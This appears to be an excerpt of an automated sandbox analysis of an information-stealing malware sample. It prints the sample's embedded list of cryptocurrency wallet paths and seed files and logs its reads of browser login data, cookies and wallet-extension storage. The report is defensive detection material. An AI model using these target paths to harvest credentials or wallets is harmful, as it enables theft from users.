Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: d985563cac.exe, 00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live-J

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
